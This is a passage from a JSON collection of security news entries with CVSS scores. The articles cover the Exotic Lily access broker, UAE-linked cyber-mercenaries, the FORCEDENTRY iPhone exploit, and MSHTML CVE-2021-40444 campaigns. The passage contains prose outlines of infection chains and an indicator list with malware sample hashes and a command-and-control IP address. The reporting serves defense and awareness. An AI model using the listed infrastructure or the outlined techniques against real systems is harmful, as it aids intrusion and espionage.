[CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), a Microsoft MSHTML Remote Code Execution (RCE) vulnerability. Microsoft also posted a [blog](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) about attacks that exploited this vulnerability. Later, the group shifted to using customized versions of [BazarLoader](<https://blog.malwarebytes.com/detections/trojan-bazar/>) delivered inside ISO files.\n\nBased on the fact that the Exotic Lily\u2019s operations require a lot of human interaction, the researchers did an analysis of the \u201cworking hours\u201d and came to the conclusion that it looks like a regular 9 to 5 operation located in a Central or Eastern Europe time zone.\n\n## Social engineering\n\nAs with most email campaigns the amount of social engineering largely defines how successful such a campaign can be. Between the millions of emails sent in a "spray-and-pray" attack, to the thousands that Exotic Lily sends out per day, there is a huge difference in success rate.\n\nExotic Lily used identity [spoofing](<https://blog.malwarebytes.com/cybercrime/2016/06/email-spoofing/>) where they replaced the TLD for a legitimate domain and replaced it with \u201c.us\u201d, \u201c.co\u201d or \u201c.biz\u201d. At first, the group would create entirely fake personas posing as employees of a real company. These personas would come including social media profiles, personal websites, and AI generated profile pictures. That must have been a lot of work, so at some point the group started to impersonate real company employees by copying their personal data from social media and business databases such as RocketReach and CrunchBase.\n\nUsing such spoofed accounts, the attackers would send [spear phishing](<https://blog.malwarebytes.com/social-engineering/2020/01/spear-phishing-101-what-you-need-to-know/>) emails with a business proposal and even engage in further communication with the target by attempting to schedule a meeting to discuss the project's design or requirements.\n\n## IOC\u2019s\n\nSHA-256 hashes of the **BazarLoader** ISO samples:\n\n * 5ceb28316f29c3912332065eeaaebf59f10d79cd9388ef2a7802b9bb80d797be\n * 9fdec91231fe3a709c8d4ec39e25ce8c55282167c561b14917b52701494ac269\n * c896ee848586dd0c61c2a821a03192a5efef1b4b4e03b48aba18eedab1b864f7\n\nSHA-256 hashes of the **BUMBLEBEE** ISO samples:\n\n * 9eacade8174f008c48ea57d43068dbce3d91093603db0511467c18252f60de32\n * 6214e19836c0c3c4bc94e23d6391c45ad87fdd890f6cbd3ab078650455c31dc8\n * 201c4d0070552d9dc06b76ee55479fc0a9dfacb6dbec6bbec5265e04644eebc9\n * 1fd5326034792c0f0fb00be77629a10ac9162b2f473f96072397a5d639da45dd\n * 01cc151149b5bf974449b00de08ce7dbf5eca77f55edd00982a959e48d017225\n\n**IP** address of the [C&C server](<https://blog.malwarebytes.com/glossary/cc/>):\n\n * 23.81.246.187\n\nStay safe, everyone!\n\nThe post [Meet Exotic Lily, access broker for ransomware and other malware peddlers](<https://blog.malwarebytes.com/threat-spotlight/2022/03/meet-exotic-lily-access-broker-for-ransomware-and-other-malware-peddlers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-18T22:58:48", "type": "malwarebytes", "title": "Meet Exotic Lily, access broker for ransomware and other malware peddlers", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-03-18T22:58:48", "id": "MALWAREBYTES:F1563A57212EB7AEC347075E94FF1605", "href": "https://blog.malwarebytes.com/threat-spotlight/2022/03/meet-exotic-lily-access-broker-for-ransomware-and-other-malware-peddlers/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:18", "description": "[![UAE Company](https://thehackernews.com/images/-wXU6Ao112oQ/YUHS9ZYKUgI/AAAAAAAADzM/8Ffb9-BFlCk8zVYCFLRjdkMHIGmvJhshACLcBGAsYHQ/s728-e1000/HACKING.jpg)](<https://thehackernews.com/images/-wXU6Ao112oQ/YUHS9ZYKUgI/AAAAAAAADzM/8Ffb9-BFlCk8zVYCFLRjdkMHIGmvJhshACLcBGAsYHQ/s0/HACKING.jpg>)\n\nThe U.S. Department of Justice (DoJ) on Tuesday disclosed it fined three intelligence community and military personnel $1.68 million in penalties for their role as cyber-mercenaries working on behalf of a U.A.E.-based cybersecurity company.\n\nThe trio in question \u2014 Marc Baier, 49, Ryan Adams, 34, and Daniel Gericke, 40 \u2014 are accused of \"knowingly and willfully combine, conspire, confederate, and agree with each other to commit offenses, \"furnishing defense services to persons and entities in the country over a three year period beginning around December 2015 and continuing through November 2019, including developing invasive spyware capable of breaking into mobile devices without any action by the targets.\n\n\"The defendants worked as senior managers at a United Arab Emirates (U.A.E.)-based company (U.A.E. CO) that supported and carried out computer network exploitation (CNE) operations (i.e., 'hacking') for the benefit of the U.A.E. government,\" the DoJ [said](<https://www.justice.gov/opa/pr/three-former-us-intelligence-community-and-military-personnel-agree-pay-more-168-million>) in a statement.\n\n\"Despite being informed on several occasions that their work for [the] U.A.E. CO, under the International Traffic in Arms Regulations (ITAR), constituted a 'defense service' requiring a license from the State Department's Directorate of Defense Trade Controls (DDTC), the defendants proceeded to provide such services without a license.\"\n\nBesides charging the individuals for violations of U.S. export control, computer fraud and access device fraud laws, the hackers-for-hire are alleged to have supervised the creation of sophisticated 'zero-click' exploits that were subsequently weaponized to illegally amass credentials for online accounts issued by U.S. companies, and to obtain unauthorized access to mobile phones around the world.\n\nThe development follows a prior investigation by Reuters in 2019, which revealed how former U.S. National Security Agency (NSA) operatives helped the U.A.E. surveil prominent Arab media figures, dissidents, and several unnamed U.S. journalists as part of a clandestine operation dubbed [Project Raven](<https://www.reuters.com/investigates/section/usa-raven/>) undertaken by a cybersecurity company named **DarkMatter**. The company's propensity to recruit \"[cyberwarriors from abroad](<https://theintercept.com/2016/10/24/darkmatter-united-arab-emirates-spies-for-hire/>)\" to research offensive security techniques first came to light in 2016.\n\nThe deep-dive report also detailed a zero-click exploit called Karma that made it possible to remotely hack into iPhones of activists, diplomats and rival foreign leaders \"simply by uploading phone numbers or email accounts into an automated targeting system.\" The sophisticated tool was used to retrieve photos, emails, text messages and location information from the victims' phones as well as harvest saved passwords, which could be abused to stage further intrusions.\n\nAccording to unsealed court documents, Baier, Adams and Gericke designed, implemented, and used Karma for foreign intelligence gathering purposes starting in May 2016 after obtaining an exploit from an unnamed U.S. company that granted zero-click remote access to Apple devices. But after the underlying security weakness was plugged in September, the defendants allegedly contacted another U.S. firm to acquire a second exploit that utilized a different vulnerability in iOS, ultimately using it to rearchitect and modify the Karma exploitation toolkit.\n\nThe charges also arrive a day after Apple [divulged](<https://thehackernews.com/2021/09/apple-issues-urgent-updates-to-fix-new.html>) that it acted to close a zero-day vulnerability (CVE-2021-30860) exploited by NSO Group's Pegasus spyware to target activists in Bahrain and Saudi Arabia.\n\n\"The FBI will fully investigate individuals and companies that profit from illegal criminal cyber activity,\" said Assistant Director Bryan Vorndran of the FBI's Cyber Division. \"This is a clear message to anybody, including former U.S. government employees, who had considered using cyberspace to leverage export-controlled information for the benefit of a foreign government or a foreign commercial company \u2013 there is risk, and there will be consequences.\"\n\n**_Update:_** A new report from MIT Technology Review has now revealed that the vulnerability that the KARMA platform leveraged to take full control of a target's iPhone was in Apple's iMessage app and that the exploit was developed and sold by an American company named Accuvant, which has since merged with Optiv.\n\n\"Accuvant sold hacking exploits to multiple customers in both governments and the private sector, including the United States and its allies \u2014 and this exact iMessage exploit was also sold simultaneously to multiple other customers,\" the report [said](<https://www.technologyreview.com/2021/09/15/1035813/us-sold-iphone-exploit-uae/>).\n\nIn a separate development, VPN provider ExpressVPN said it was aware of Daniel Gericke's previous employment before hiring him. Gericke, who is currently the Chief Information Officer at the company, is one the three individuals who have been implicated for their unlicensed work as mercenary hackers directing U.A.E.-funded intrusion campaigns.\n\n\"We've known the key facts relating to Daniel's employment history since before we hired him, as he disclosed them proactively and transparently with us from the start,\" the company [said](<https://www.expressvpn.com/blog/statement-on-dpa/>) in a statement. \"In fact, it was his history and expertise that made him an invaluable hire for our mission to protect users' privacy and security.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T11:03:00", "type": "thn", "title": "3 Former U.S. Intelligence Officers Admit to Hacking for UAE Company", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30860"], "modified": "2021-09-16T05:03:29", "id": "THN:3691EA68445933ED72DD1B52F712F791", "href": "https://thehackernews.com/2021/09/3-former-us-intelligence-officers-admit.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:36", "description": "[![Weaponizing iPhone Bug for Spyware](https://thehackernews.com/new-images/img/a/AVvXsEh3TPKLg1hzNepKY2F1EdKmCpaHrcAUG9Nn6hJVDlrM4nXTEWXpqUnXEJ64FAumNDQUssibvY7ImZBz3iB3aqxCsYh_HuDr4ufd56aYQQv_Tdz0QCf4S-cwiQ6xFCMw-lcMG13U8360IHMqN3rAdQkA5liqwCnHgdZfTeh39gVBvfieTaBOAn9awulf=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEh3TPKLg1hzNepKY2F1EdKmCpaHrcAUG9Nn6hJVDlrM4nXTEWXpqUnXEJ64FAumNDQUssibvY7ImZBz3iB3aqxCsYh_HuDr4ufd56aYQQv_Tdz0QCf4S-cwiQ6xFCMw-lcMG13U8360IHMqN3rAdQkA5liqwCnHgdZfTeh39gVBvfieTaBOAn9awulf>)\n\nA now-patched security vulnerability in Apple iOS that was previously found to be exploited by Israeli company NSO Group was also separately weaponized by a different surveillance vendor named **QuaDream **to hack into the company's devices.\n\nThe development was reported by [Reuters](<https://www.reuters.com/technology/exclusive-iphone-flaw-exploited-by-second-israeli-spy-firm-sources-2022-02-03/>), citing unnamed sources, noting that \"the two rival businesses gained the same ability last year to remotely break into iPhones [and] compromise Apple phones without an owner needing to open a malicious link.\"\n\nThe zero-click exploit in question is [FORCEDENTRY](<https://thehackernews.com/2021/08/bahraini-activists-targeted-using-new.html>), a flaw in iMessage that could be leveraged to [circumvent iOS security protections](<https://thehackernews.com/2021/01/google-uncovers-new-ios-security.html>) and install spyware that allowed attackers to scoop up a wealth of information such as contacts, emails, files, messages, and photos, as well as access to the phone's camera and microphone.\n\nGoogle Project Zero, which studies zero-day vulnerabilities in hardware and software systems such as operating systems, web browsers, and open source libraries, [called](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>) FORCEDENTRY (CVE-2021-30860, CVSS score: 7.8) \"one of the most technically sophisticated exploits.\"\n\nQuaDream's spyware, named **REIGN**, functions in a manner similar to NSO Group's Pegasus, granting its users full control of the device. Apple [addressed](<https://thehackernews.com/2021/09/apple-issues-urgent-updates-to-fix-new.html>) the underlying defect in September 2021 and later sued NSO Group for [abusing the exploit](<https://thehackernews.com/2021/07/new-leak-reveals-abuse-of-pegasus.html>) to attack iPhones with surveillanceware.\n\nThe disclosure comes as The New York Times [released](<https://www.nytimes.com/2022/01/28/magazine/nso-group-israel-spyware.html>) an [eye-opening report](<https://www.nytimes.com/2022/01/28/world/middleeast/israel-pegasus-spyware.html>) late last month highlighting the use of Pegasus by the Central Intelligence Agency (CIA) to help combat terrorism in Djibouti as well as its purchase by a number of countries, including [India](<https://www.thehindu.com/news/national/indian-intelligence-service-bought-pegasus-from-israel-coordinated-with-mossad-nyt-reporter/article38364766.ece>), Mexico, Saudi Arabia, and the U.A.E.\n\nThe yearlong investigation also revealed that the U.S. Federal Bureau of Investigation (FBI) \"bought and tested NSO software for years with plans to use it for domestic surveillance until the agency finally decided last year not to deploy the tools.\"\n\nOn top of that, the new system, dubbed Phantom, is believed to have been equipped with capabilities to target phone numbers located in the U.S., going against the [company's previous claims](<https://thehackernews.com/2021/12/pegasus-spyware-reportedly-hacked.html>) that its spyware cannot be used on phone numbers with a +1 country code.\n\nEarlier this week, the FBI [confirmed](<https://www.washingtonpost.com/technology/2022/02/02/pegasus-fbi-nso-test/>) to The Washington Post that it had indeed procured a license to use the tool and test its capabilities on phones using foreign SIM cards. However, the agency added that it used the product \"for product testing and evaluation only,\" and that it never used it operationally or to support any investigation.\n\nNSO Group, which was also [blocklisted by the U.S. government](<https://thehackernews.com/2021/11/us-sanctions-pegasus-maker-nso-group.html>) in November 2021, has been besieged by numerous setbacks in recent months, what with its spyware linked to numerous instances of political surveillance targeting diplomats and government officials in [Finland](<https://um.fi/current-affairs/-/asset_publisher/gc654PySnjTX/content/ulkoministerio-on-saanut-selvitettya-siihen-kohdistuneen-vakoilutapauksen>), [Poland](<https://apnews.com/article/technology-business-middle-east-elections-europe-c16b2b811e482db8fbc0bbc37c00c5ab>), and [the U.S](<https://thehackernews.com/2021/12/pegasus-spyware-reportedly-hacked.html>).\n\n\"The continuous revelations around the advanced spyware programs over the last year show the world just how much development is behind sophisticated mobile attacks,\" said Richard Melick, director of product strategy at Zimperium. \"These attacks are not just one vulnerability and exploit; they encompass fully developed toolsets designed to deliver the most effective spyware for its customers coming from known and unknown organizations.\"\n\n\"While lacking advanced threat detection solutions, the mobile phone's continuous connections with personal and critical data systems make it a lucrative target for any malicious organization and its customers,\" Melick added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-04T11:52:00", "type": "thn", "title": "Another Israeli Firm, QuaDream, Caught Weaponizing iPhone Bug for Spyware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30860"], "modified": "2022-02-06T05:23:57", "id": "THN:E72737D2B8E842D4AB9BD4F993737BD9", "href": "https://thehackernews.com/2022/02/another-israeli-firm-quadream-caught.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:39", "description": "[![MSHTML Flaw](https://thehackernews.com/new-images/img/a/AVvXsEjqkUGrj098m-d_WWiB3rvM91Eu1x3fZweKFwfNSYwVrZToTWUlCh3s3UvHQIXtbPP4vPubJ_dEdC7jSX7gGkeScLCqYsa37Zuw_hFBK6g9FbzvO5nMZPrRUk6fjS1F01cduuDD_mnZ-OKnauen-xJmprSHgWH_jmx8MYUffZvp4uojtUBzm6BbCwIZ=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEjqkUGrj098m-d_WWiB3rvM91Eu1x3fZweKFwfNSYwVrZToTWUlCh3s3UvHQIXtbPP4vPubJ_dEdC7jSX7gGkeScLCqYsa37Zuw_hFBK6g9FbzvO5nMZPrRUk6fjS1F01cduuDD_mnZ-OKnauen-xJmprSHgWH_jmx8MYUffZvp4uojtUBzm6BbCwIZ>)\n\nCybersecurity researchers on Tuesday took the wraps off a multi-stage espionage campaign targeting high-ranking government officials overseeing national security policy and individuals in the defense industry in Western Asia.\n\nThe attack is unique as it leverages Microsoft OneDrive as a command-and-control (C2) server and is split into as many as six stages to stay as hidden as possible, Trellix \u2014 a new company created following the merger of security firms McAfee Enterprise and FireEye \u2014 said in a [report](<https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html>) shared with The Hacker News.\n\n\"This type of communication allows the malware to go unnoticed in the victims' systems since it will only connect to legitimate Microsoft domains and won't show any suspicious network traffic,\" Trellix explained.\n\nFirst signs of activity associated with the covert operation are said to have commenced as early as June 18, 2021, with two victims reported on September 21 and 29, followed by 17 more in a short span of three days between October 6 and 8.\n\n\"The attack is particularly unique due to the prominence of its victims, the use of a recent [security flaw], and the use of an attack technique that the team had not seen before,\" Christiaan Beek, lead scientist at Trellix, said. \"The objective was clearly espionage.\"\n\nTrellix attributed the sophisticated attacks with moderate confidence to the Russia-based [APT28](<https://malpedia.caad.fkie.fraunhofer.de/actor/sofacy>) group, also tracked under the monikers Sofacy, Strontium, Fancy Bear, and Sednit, based on similarities in the source code as well as in the attack indicators and geopolitical objectives.\n\n[![MSHTML Flaw](https://thehackernews.com/new-images/img/a/AVvXsEiHATh-_6CXq1DE4gF63tRFptoK4b3k33uBkDfc-JwaJRbLhn0cxU2JHUh5A-0U_AsQ3XgqvcFjPKtR6AVo-_daYwK8-jLWPGzamt2d7MjD1zstHO8IFPqdv3NTZU3GvsI_Wdk9Q7rG6zd84PEcawqbp7bJMrog9xoaUDkiJadygQnO1Wh-qdlH79xN=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEiHATh-_6CXq1DE4gF63tRFptoK4b3k33uBkDfc-JwaJRbLhn0cxU2JHUh5A-0U_AsQ3XgqvcFjPKtR6AVo-_daYwK8-jLWPGzamt2d7MjD1zstHO8IFPqdv3NTZU3GvsI_Wdk9Q7rG6zd84PEcawqbp7bJMrog9xoaUDkiJadygQnO1Wh-qdlH79xN>)\n\n\"We are supremely confident that we are dealing with a very skilled actor based on how infrastructure, malware coding and operation were set up,\" Trellix security researcher Marc Elias said.\n\nThe infection chain begins with the execution of a Microsoft Excel file containing an exploit for the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)), which is used to run a malicious binary that acts as the downloader for a third-stage malware dubbed Graphite.\n\nThe DLL executable uses OneDrive as the C2 server via the Microsoft Graph API to retrieve additional stager malware that ultimately downloads and executes [Empire](<https://attack.mitre.org/software/S0363/>), an open-source PowerShell-based post-exploitation framework widely abused by threat actors for follow-on activities.\n\n\"Using the Microsoft OneDrive as a command-and-control Server mechanism was a surprise, a novel way of quickly interacting with the infected machines by dragging the encrypted commands into the victim's folders,\" Beek explained. \"Next OneDrive would sync with the victim\u2019s machines and encrypted commands being executed, whereafter the requested info was encrypted and sent back to the OneDrive of the attacker.\"\n\nIf anything, the development marks the continued exploitation of the MSTHML rendering engine flaw, with [Microsoft](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) and [SafeBreach Labs](<https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html>) disclosing multiple campaigns that have weaponized the vulnerability to plant malware and distribute custom Cobalt Strike Beacon loaders.\n\n\"The main takeaway is to highlight the level of access threat campaigns, and in particular how capable threat actors are able to permeate the most senior levels of government,\" Raj Samani, chief scientist and fellow at Trellix told The Hacker News. \"It is of paramount importance that security practitioners tasked with protecting such high value systems consider additional security measures to prevent, detect and remediate against such hostile actions.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-01-25T14:04:00", "type": "thn", "title": "Hackers Exploited MSHTML Flaw to Spy on Government and Defense Targets", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-29T08:06:51", "id": "THN:BD014635C5F702379060A20290985162", "href": "https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:18", "description": "[![](https://thehackernews.com/images/-3vEprTVA4BI/YULvTEzYNCI/AAAAAAAADz0/RpSk1fU9GbcY7e98Gg2r8aBRvy73Z52kACLcBGAsYHQ/s0/cyberattack.jpg)](<https://thehackernews.com/images/-3vEprTVA4BI/YULvTEzYNCI/AAAAAAAADz0/RpSk1fU9GbcY7e98Gg2r8aBRvy73Z52kACLcBGAsYHQ/s0/cyberattack.jpg>)\n\nMicrosoft on Wednesday disclosed details of a targeted phishing campaign that leveraged a now-patched zero-day flaw in its MSHTML platform using specially-crafted Office documents to deploy Cobalt Strike Beacon on compromised Windows systems.\n\n\"These attacks used the vulnerability, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>), as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders,\" Microsoft Threat Intelligence Center [said](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in a technical write-up. \"These loaders communicated with an infrastructure that Microsoft associates with multiple cybercriminal campaigns, including human-operated ransomware.\"\n\nDetails about CVE-2021-40444 (CVSS score: 8.8) first [emerged](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) on September 7 after researchers from EXPMON alerted the Windows maker about a \"highly sophisticated zero-day attack\" aimed at Microsoft Office users by taking advantage of a remote code execution vulnerability in MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Office to render web content inside Word, Excel, and PowerPoint documents.\n\n\"The observed attack vector relies on a malicious ActiveX control that could be loaded by the browser rendering engine using a malicious Office document,\" the researchers noted. Microsoft has since [rolled out a fix](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) for the vulnerability as part of its Patch Tuesday updates a week later on September 14.\n\nThe Redmond-based tech giant attributed the activities to related cybercriminal clusters it tracks as DEV-0413 and DEV-0365, the latter of which is the company's moniker for the emerging threat group associated with creating and managing the Cobalt Strike infrastructure used in the attacks. The earliest exploitation attempt by DEV-0413 dates back to August 18.\n\nThe exploit delivery mechanism originates from emails impersonating contracts and legal agreements hosted on file-sharing sites. Opening the malware-laced document leads to the download of a Cabinet archive file containing a DLL bearing an INF file extension that, when decompressed, leads to the execution of a function within that DLL. The DLL, in turn, retrieves remotely hosted shellcode \u2014 a custom Cobalt Strike Beacon loader \u2014 and loads it into the Microsoft address import tool.\n\nAdditionally, Microsoft said some of the infrastructures that were used by DEV-0413 to host the malicious artifacts were also involved in the delivery of BazaLoader and Trickbot payloads, a separate set of activities the company monitors under the codename DEV-0193 (and by Mandiant as UNC1878).\n\n\"At least one organization that was successfully compromised by DEV-0413 in their August campaign was previously compromised by a wave of similarly-themed malware that interacted with DEV-0365 infrastructure almost two months before the CVE-2021-40444 attack,\" the researchers said. \"It is currently not known whether the retargeting of this organization was intentional, but it reinforces the connection between DEV-0413 and DEV-0365 beyond sharing of infrastructure.\"\n\nIn an independent investigation, Microsoft's RiskIQ subsidiary attributed the attacks with high confidence to a ransomware syndicate known as Wizard Spider aka Ryuk, noting that the network infrastructure employed to provide command-and-control to the Cobalt Strike Beacon implants spanned more than 200 active servers.\n\n\"The association of a zero-day exploit with a ransomware group, however remote, is troubling,\" RiskIQ researchers [said](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>). It suggests either that turnkey tools like zero-day exploits have found their way into the already robust ransomware-as-a-service (RaaS) ecosystem or that the more operationally sophisticated groups engaged in traditional, government-backed espionage are using criminally controlled infrastructure to misdirect and impede attribution.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T07:19:00", "type": "thn", "title": "Windows MSHTML 0-Day Exploited to Deploy Cobalt Strike Beacon in Targeted Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-12T15:17:20", "id": "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "href": "https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-30T17:38:47", "description": "[![](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgi3RXvGtPoTC8ufDqadLbye4bhkJjWs-Un41xcwOWrqQPpLekG-pG0Xxk-or-GInK-LQOG7QDpCF3p4FVNPMxdNLSsl4TgenAVq4LOJcfYcZ0LcgQ0zlwru8TY2ff5ffd7EEPtwFERwA4hDGj0uKeJYZBw1AGUroAFwL-QXSJrDONv8gHe7E2ghPpr/s728-e100/hacking-code.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgi3RXvGtPoTC8ufDqadLbye4bhkJjWs-Un41xcwOWrqQPpLekG-pG0Xxk-or-GInK-LQOG7QDpCF3p4FVNPMxdNLSsl4TgenAVq4LOJcfYcZ0LcgQ0zlwru8TY2ff5ffd7EEPtwFERwA4hDGj0uKeJYZBw1AGUroAFwL-QXSJrDONv8gHe7E2ghPpr/s728-e100/hacking-code.jpg>)\n\nCybersecurity researchers are calling attention to a zero-day flaw in Microsoft Office that could be abused to achieve arbitrary code execution on affected Windows systems.\n\nThe vulnerability came to light after an independent cybersecurity research team known as nao_sec uncovered a Word document (\"[05-2022-0438.doc](<https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection>)\") that was uploaded to VirusTotal from an IP address in Belarus.\n\n\"It uses Word's external link to load the 